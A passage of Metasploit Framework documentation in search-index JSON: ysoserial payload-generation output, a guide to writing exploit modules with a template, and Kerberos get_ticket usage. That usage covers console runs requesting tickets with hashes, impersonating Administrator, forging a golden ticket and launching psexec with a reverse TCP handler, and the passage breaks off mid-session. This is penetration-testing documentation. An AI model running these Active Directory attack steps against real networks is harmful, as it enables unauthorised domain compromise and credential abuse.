Unsupported command [] at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:71) at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:40) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'FileUpload1' and it will not be supported Generating payloads for Groovy1... Generating payloads for Hibernate1... Generating payloads for Hibernate2... Error while generating or serializing payload java.sql.SQLException: DataSource name cannot be empty string at javax.sql.rowset.BaseRowSet.setDataSourceName(BaseRowSet.java:855) at com.sun.rowset.JdbcRowSetImpl.setDataSourceName(JdbcRowSetImpl.java:4307) at ysoserial.payloads.Hibernate2.getObject(Hibernate2.java:58) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Hibernate2' and it will not be supported Generating payloads for JBossInterceptors1... Generating payloads for JRMPClient... Generating payloads for JRMPListener... Error while generating or serializing payload java.lang.NumberFormatException: For input string: \"\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:592) at java.lang.Integer.parseInt(Integer.java:615) at ysoserial.payloads.JRMPListener.getObject(JRMPListener.java:42) at ysoserial.payloads.JRMPListener.getObject(JRMPListener.java:34) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'JRMPListener' and it will not be supported Generating payloads for JSON1... Generating payloads for JavassistWeld1... Generating payloads for Jdk7u21... Generating payloads for Jython1... Error while generating or serializing payload java.lang.IllegalArgumentException: Unsupported command [] at ysoserial.payloads.Jython1.getObject(Jython1.java:52) at ysoserial.payloads.Jython1.getObject(Jython1.java:42) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Jython1' and it will not be supported Generating payloads for MozillaRhino1... Generating payloads for Myfaces1... Generating payloads for Myfaces2... Error while generating or serializing payload java.lang.IllegalArgumentException: Command format is: &amp;lt;base_url&amp;gt;:&amp;lt;classname&amp;gt; at ysoserial.payloads.Myfaces2.getObject(Myfaces2.java:47) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Myfaces2' and it will not be supported Generating payloads for ROME... Generating payloads for Spring1... Generating payloads for Spring2... Generating payloads for URLDNS... Error while generating or serializing payload java.net.MalformedURLException: no protocol: at java.net.URL.&amp;lt;init&amp;gt;(URL.java:593) at ysoserial.payloads.URLDNS.getObject(URLDNS.java:56) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'URLDNS' and it will not be supported Generating payloads for Vaadin1... Generating payloads for Wicket1... Error while generating or serializing payload java.lang.IllegalArgumentException: Bad command format. at ysoserial.payloads.Wicket1.getObject(Wicket1.java:59) at ysoserial.payloads.Wicket1.getObject(Wicket1.java:49) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ERROR: Errored while generating 'Wicket1' and it will not be supported DONE! Successfully generated 0 static payloads and 22 dynamic payloads. Skipped 8 unsupported payloads. At completion, the data/ysoserial_payloads.json file is overwritten and the 22 dynamic payloads are ready for use within the framework. Afterward, the developer should follow the standard git procedures to add and commit the new JSON file before generating a pull request and landing the updated JSON into the framework’s master branch. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#regenerating-the-ysoserial_payload-json-file-maintainers-only",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html#regenerating-the-ysoserial_payload-json-file-maintainers-only"
  },"123": {
    "doc": "Java Deserialization",
    "title": "Java Deserialization",
    "content": "Instead of embedding static Java serialized objects, Metasploit offers ysoserial-generated binaries with built-in randomization. The benefits of using the Metasploit library include quicker module development, easier-to-read code, and future-proof Java serialized objects. To use the ysoserial libraries, let’s look at an example from the shiro_rememberme_v124_deserialize module: . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/generating-ysoserial-java-serialized-objects.html"
  },"124": {
    "doc": "Writing an exploit",
    "title": "On this page",
    "content": ". | Plan your module | Ranking | Template | Basic git commands | References | . The real kung-fu behind exploit development isn’t actually about which language you choose to build it; it’s about your precise understanding of how input is processed by the application you’re debugging, and how to gain control by manipulating it. That’s right; the keyword is “debugging.” Your binjitsu (reverse-engineering) is where the real kung-fu is. However, if your goal isn’t just about popping a calculator, but actually want to weaponize, to maintain, and to provide use in the practical world, you need a development framework. And this is where Metasploit comes in. It’s a framework that’s free and open-source, actively contributed by researchers around the world. So when you write a Metasploit exploit, you don’t have to worry about any dependency issues, or having the wrong version, or not having enough payloads for different pentesting scenarios to choose from, etc. The idea is all you need to do is focus on building that exploit, and nothing more. ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#on-this-page"
  },"125": {
    "doc": "Writing an exploit",
    "title": "Plan your module",
    "content": "First, ask yourself will exploiting this vulnerability result in executing a payload? If not, then despite exploiting a vulnerability, for Metasploit’s purposes the module would fall into the auxiliary category. Unlike writing a proof-of-concept, when you write a Metasploit module, you need to think about how users might use it in the real world. Stealth is usually an important element to think about. Can your exploit achieve code execution without dropping a file? Can the input look more random, so it’s more difficult to detect? How about obfuscation? Is it generating unnecessary traffic? Can it be more stable without crashing the system? . Try to be precise about exploitable requirements. Usually, a bug is specific to a range of versions or even builds. If you can’t automatically check that, you need to at least mention it in the description somewhere. Some of your exploit’s techniques might also be application-specific. For example, you can take advantage of a specific behavior in the application to generate heap allocations the way you want, but maybe it’s noisier in the newer version, so that gives you some stability issues. Does it need a 3rd-party component to work that may not even be installed by everyone? Even if it is, is the component revised often enough that it could make your exploit less reliable? . Know that in the real world, your exploit can break or fail in a lot of different ways. You should try to find out and fix it during the development and testing phase before learning the hard way. ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#plan-your-module",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#plan-your-module"
  },"126": {
    "doc": "Writing an exploit",
    "title": "Ranking",
    "content": "As you can see, reliability is important to Metasploit, and we try to be more friendly about this for the users. I know what you’re thinking: “Well, if they’re using the exploit, they should understand how it works, so they know what they’re getting themselves into.” In the perfect world, yes. Knowing how a vulnerability works or how an exploit works will only benefit the user, but you see, we don’t live in the perfect world. If you’re in the middle of a penetration test, it’s very unlikely to always find the time to recreate the vulnerable environment, strip the exploit to the most basic form to debug what’s going on, and then do testing. Chances are you have a tight schedule to break into a large network, so you need to use your time carefully. Because of this, it’s important to at least have a good description and good references for the module. And of course, a ranking system that can be trusted. The Metasploit Framework has seven different rankings to indicate how reliable an exploit is. See Exploit Ranking for more details. ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#ranking",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#ranking"
  },"127": {
    "doc": "Writing an exploit",
    "title": "Template",
    "content": "If you have read this far, we think you are pretty impressive because it’s a lot to digest. You are probably wondering why we haven’t had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn’t be telling you how to write an exploit. What we’ve done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it’s impossible to go over all of them in a single page, so you must either read the API documentation, existing code examples, or look for more wiki pages we’ve written to cover specific mixins. For example, if you’re looking for a writeup about how to interact with an HTTP server, you might be interested in: How to send an HTTP Request Using HTTPClient. If you’re interested in browser exploit writing, definitely check out: How to write a browser exploit using BrowserExploitServer, etc. But of course, to begin, you most likely need a template to work with, and here it is. We’ll also explain how to fill out the required fields: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; '[Vendor] [Software] [Root Cause] [Vulnerability type]', 'Description' =&amp;gt; %q{ Say something that the user might need to know }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Name' ], 'References' =&amp;gt; [ [ 'URL', '' ] ], 'Platform' =&amp;gt; 'win', 'Targets' =&amp;gt; [ [ 'System or software version', { 'Ret' =&amp;gt; 0x41414141 # This will be available in `target.ret` } ] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'Privileged' =&amp;gt; false, 'DisclosureDate' =&amp;gt; '', 'DefaultTarget' =&amp;gt; 0, 'Notes' =&amp;gt; { 'Stability' =&amp;gt; [CRASH_SAFE], 'Reliability' =&amp;gt; [REPEATABLE_SESSION], 'SideEffects' =&amp;gt; [ARTIFACTS_ON_DISK, IOC_IN_LOGS] }, ) ) end def check # For the check command end def exploit # Main function end end . | Name - The Name field should begin with the name of the vendor, followed by the software. Ideally, the “Root Cause” field means which component or function the bug is found. And finally, the type of vulnerability the module is exploiting. | Description - The Description field should explain what the module does, things to watch out for, specific requirements, the more, the better. The goal is to let the user understand what he’s using without the need to actually read the module’s source and figure things out. And trust me, most of them don’t. | Author field is where you put your name. The format should be “Name “. If you want to have your Twitter handle there, leave it as a comment, for example: “Name # handle” . | References - The References field is an array of references related to the vulnerability or the exploit. For example, an advisory, a blog post, etc. Make sure you use known reference identifiers – see Module reference identifiers for a list. | Platform - The Platform field indicates what platforms are supported, for example: win, linux, osx, unix, bsd. | Targets - The Targets field is an array of systems, applications, setups, or specific versions your exploit is targeting. The second element or each target array is where you store specific metadata about that target, for example, a specific offset, a gadget, a ret address, etc. When a target is selected by the user, the metadata is loaded and tracked by a “target index”, and can be retrieved by using the target method. | Payloads - The Payloads field specifies how the payload should be encoded and generated. You can specify: Space, SaveRegisters, Prepend, PrependEncoder, BadChars, Append, AppendEncoder, MaxNops, MinNops, Encoder, Nop, EncoderType, EncoderOptions, ExtendedOptions, EncoderDontFallThrough. | DisclosureDate - The DisclosureDate is about when the vulnerability was disclosed in public, in the format of: “M D Y”. For example: “Apr 04 2014” . | Notes - The Notes field is a hash always containing three keys. The value of each key is an array of constants. The list of available constants can be found in the Definition of Module Reliability Side Effects and Stability. The key should be present even if the array is empty. | Stability - The Stability field describes how the exploit affects the system it’s being run on, ex: CRASH_SAFE, CRASH_OS_DOWN | Reliability - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: REPEATABLE_SESSION, UNRELIABLE_SESSION | SideEffects - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: ARTIFACTS_ON_DISK, IOC_IN_LOGS, ACCOUNT_LOCKOUTS. | . | . Your exploit should also have a check method to support the check command, but this is optional in case it’s not possible. And finally, the exploit method is like your main method. Start writing your code there. An example exploit module is also available: example.rb . ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#template",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#template"
  },"128": {
    "doc": "Writing an exploit",
    "title": "Basic git commands",
    "content": "Metasploit no longer uses svn for source code management. Instead, we use git, so knowing some tricks with git go a long way. We’re not here to lecture you about how awesome git is; we know it has a learning curve, and it’s not surprising to find new users making mistakes. Every once a while, your git “rage” will kick in, and we understand. However, it’s important for you to take advantage of branching. Every time you make a module or make some changes to existing code, you should not do so on the default master branch. Why? Because when you do a msfupdate, which is Metasploit’s utility for updating your repository, it will do a git reset before merging the changes, and all your code goes away. Another mistake people tend to do is have all the changes on master before submitting a pull request. This is a bad idea because most likely; you’re submitting other crap you don’t intend to change, or you’re probably asking us to merge other unnecessary commit histories when there only needs to be one commit. Thanks for contributing your module to the community, but no thanks to your crazy commit history. So as a habit, when you want to make something new, or change something, begin with a new branch that’s up to date to master. First off, make sure you’re on master. If you do a git status it will tell you what branch you’re currently on: . $ git status # On branch upstream-master nothing to commit, working directory clean . Ok, now do a git pull to download the latest changes from Metasploit: . $ git pull Already up-to-date. At this point, you’re ready to start a new branch. In this case, we’ll name our new branch “my_awesome_branch”: . $ git checkout -b my_awesome_branch Switched to a new branch 'my_awesome_branch' . And then you can go ahead and add that module. Make sure it’s in the appropriate path: . $ git add [module path] . When you decide to save the changes, commit (if there’s only one module, you can do git commit -a too so you don’t have to type the module path. Note -a really means EVERYTHING): . $ git commit [module path] . When you’re done, push your changes, which will upload your code to your remote branch “my_awesome_branch”. You must push your changes in order to submit the pull request or share it with others on the Internet. $ git push origin my_awesome_branch . ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#basic-git-commands",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#basic-git-commands"
  },"129": {
    "doc": "Writing an exploit",
    "title": "References",
    "content": ". | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit.rb | . ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#references",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html#references"
  },"130": {
    "doc": "Writing an exploit",
    "title": "Writing an exploit",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html",
    "relUrl": "/docs/development/developing-modules/guides/get-started-writing-an-exploit.html"
  },"131": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Requesting tickets",
    "content": "The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. The following ACTIONS are supported: . | GET_TGT: legally request a TGT from the KDC given a password, a NT hash or an encryption key. The resulting TGT will be cached. | GET_TGS: legally request a TGS from the KDC given a password, a NT hash, an encryption key or a cached TGT. If the TGT is not provided, it will request it the same way the “TGT action” does. The resulting TGT and the TGS will be cached. | . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#requesting-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#requesting-tickets"
  },"132": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/get_ticket | Do: run rhosts=&amp;lt;remote host&amp;gt; domain=&amp;lt;domain&amp;gt; username=&amp;lt;username&amp;gt; password=&amp;lt;password&amp;gt; action=GET_TGT | You should see that the TGT is correctly retrieved and stored in loot as well as the klist command | Try with the NT hash (NTHASH option) and the encryption key (AES_KEY option) instead of the password | Do: run rhosts=&amp;lt;remote host&amp;gt; domain=&amp;lt;domain&amp;gt; username=&amp;lt;username&amp;gt; password=&amp;lt;password&amp;gt; action=GET_TGS spn=&amp;lt;SPN&amp;gt; | You should see that the module uses the TGT in the cache and does not request a new one | You should see TGS is correctly retrieved and stored in the loot | Do: run rhosts=&amp;lt;remote host&amp;gt; domain=&amp;lt;domain&amp;gt; username=&amp;lt;username&amp;gt; password=&amp;lt;password&amp;gt; action=GET_TGS spn=&amp;lt;SPN&amp;gt; KrbUseCachedCredentials=false | You should see the module does not use the TGT in the cache and requests a new one | You should see both the TGT and the TGS are correctly retrieved and stored in the loot | Try with the NT hash (NTHASH option) and the encryption key (AES_KEY option) instead of the password | . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#module-usage"
  },"133": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Options",
    "content": "CERT_FILE . The PKCS12 (.pfx) certificate file to authenticate with. When this option is set, USERNAME and DOMAIN are optional and will be extracted from the certificate unless specified. Specifying a certificate causes PKINIT to be used to obtain the ticket. The module will provide a warning if USERNAME and DOMAIN are set but do not match any entries within the certificate. CERT_PASSWORD . The certificate file’s password. DOMAIN . The Fully Qualified Domain Name (FQDN). Ex: mydomain.local . USERNAME . The domain username to authenticate with. PASSWORD . The user’s password to use. NTHASH . The user’s NT hash in hex string to authenticate with. Not that the DC must support RC4 encryption. AES_KEY . The user’s AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits. SPN . This option is only used when requesting a TGS. The Service Principal Name, the format is service_name/FQDN. Ex: cifs/dc01.mydomain.local. IMPERSONATE . The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket). KrbUseCachedCredentials . This option is only used when requesting a TGS. If set to true, it looks for a matching TGT in the database and, if found, use it for Kerberos authentication when requesting a TGS. Default is true. Krb5Ccname . This option is only used when requesting a TGS. The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked’ . ",
    "url": "/docs/pentesting/active-directory/kerberos/get_ticket.html#options",
    "relUrl": "/docs/pentesting/active-directory/kerberos/get_ticket.html#options"
  },"134": {
    "doc": "Get Ticket granting tickets and service tickets",
    "title": "Scenarios",
    "content": "Requesting a TGT . An example of viewing the Kerberos ticket cache, and requesting a TGT with NT hash: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; klist Kerberos Cache ============== No tickets msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=&amp;lt;redacted&amp;gt; action=GET_TGT [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104181416_default_10.0.0.24_mit.kerberos.cca_912121.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; klist Kerberos Cache ============== host principal sname issued status path ---- --------- ----- ------ ------ ---- 192.168.123.13 [email protected] krbtgt/[email protected] 2023-01-12 19:37:54 +0000 valid /Users/usr/.msf4/loot/20230112193756_default_192.168.123.13_mit.kerberos.cca_131390.bin msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.24 Unknown device msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.0.0.24 88 tcp kerberos open Module: auxiliary/admin/kerberos/get_ticket, KDC for domain mylab.local . TGT with encryption key . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=&amp;lt;redacted&amp;gt; action=GET_TGT [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGT for [email protected] [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182051_default_10.0.0.24_mit.kerberos.cca_535003.bin [*] Auxiliary module execution completed . TGT with password . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=&amp;lt;redacted&amp;gt; action=GET_TGT [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGT for [email protected] [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182219_default_10.0.0.24_mit.kerberos.cca_533360.bin [*] Auxiliary module execution completed . TGT with certificate . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 cert_file=/home/msfuser/.msf4/loot/20230124155521_default_10.0.0.24_windows.ad.cs_384669.pfx action=GET_TGT [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGT for [email protected] [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20230124155555_default_192.168.159.10_mit.kerberos.cca_702818.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; . Requesting a TGS . TGS with NT hash: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=&amp;lt;redacted&amp;gt; action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_760650.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_883314.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_760650.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104182601_default_10.0.0.24_mit.kerberos.cca_883314.bin . TGS with encryption key: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=&amp;lt;redacted&amp;gt; action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183040_default_10.0.0.24_mit.kerberos.cca_140502.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183040_default_10.0.0.24_mit.kerberos.cca_500387.bin [*] Auxiliary module execution completed . TGS with password: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=&amp;lt;redacted&amp;gt; action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin [*] Auxiliary module execution completed . TGS with cached TGT: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Using cached credential for krbtgt/mylab.local Administrator [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183346_default_10.0.0.24_mit.kerberos.cca_525186.bin [*] Auxiliary module execution completed . TGS without cached TGT: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local KrbUseCachedCredentials=false [*] Running module against 10.0.0.24 [-] Auxiliary aborted due to failure: unknown: Error while requesting a TGT: Kerberos Error - KDC_ERR_PREAUTH_REQUIRED (25) - Additional pre-authentication required - Check the authentication-related options (PASSWORD, NTHASH or AES_KEY) [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator action=GET_TGS spn=cifs/dc02.mylab.local KrbUseCachedCredentials=false password=&amp;lt;redacted&amp;gt; [*] Running module against 10.0.0.24 [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved on /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_171694.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin . TGS impersonating the Administrator account: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run verbose=true rhosts=10.0.0.24 domain=mylab.local username=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator [*] Running module against 10.0.0.24 [*] 10.0.0.24:88 - Getting TGS impersonating [email protected] (SPN: cifs/dc02.mylab.local) [+] 10.0.0.24:88 - Received a valid TGT-Response [*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin [+] 10.0.0.24:88 - Received a valid TGS-Response [+] 10.0.0.24:88 - Received a valid TGS-Response [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin 10.0.0.24 mit.kerberos.ccache application/octet-stream realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin . TGS using a previously forged golden ticket: . # Forge a golden ticket msf6 auxiliary(admin/kerberos/forge_ticket) &amp;gt; run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator [*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin [*] Auxiliary module execution completed # Request a silver ticket: msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local [*] Running module against 10.10.11.5 [*] 10.10.11.5:88 - Using cached credential for krbtgt/[email protected] [email protected] [*] 10.10.11.5:88 - Getting TGS for [email protected] (SPN: cifs/dc02.dev.demo.local) [+] 10.10.11.5:88 - Received a valid TGS-Response [*] 10.10.11.5:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin [+] 10.10.11.5:88 - Received a valid delegation TGS-Response [*] Auxiliary module execution completed # Use psexec: msf6 exploit(windows/smb/psexec) &amp;gt; run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1 [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 10.10.11.5:445 - Connecting to the server... [*] 10.10.11.5:445 - Authenticating to 10.10.11.5:445|dev.demo.local as user 'Administrator'... [*] 10.10.11.5:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin [*] 10.10.11.5:445 - Selecting 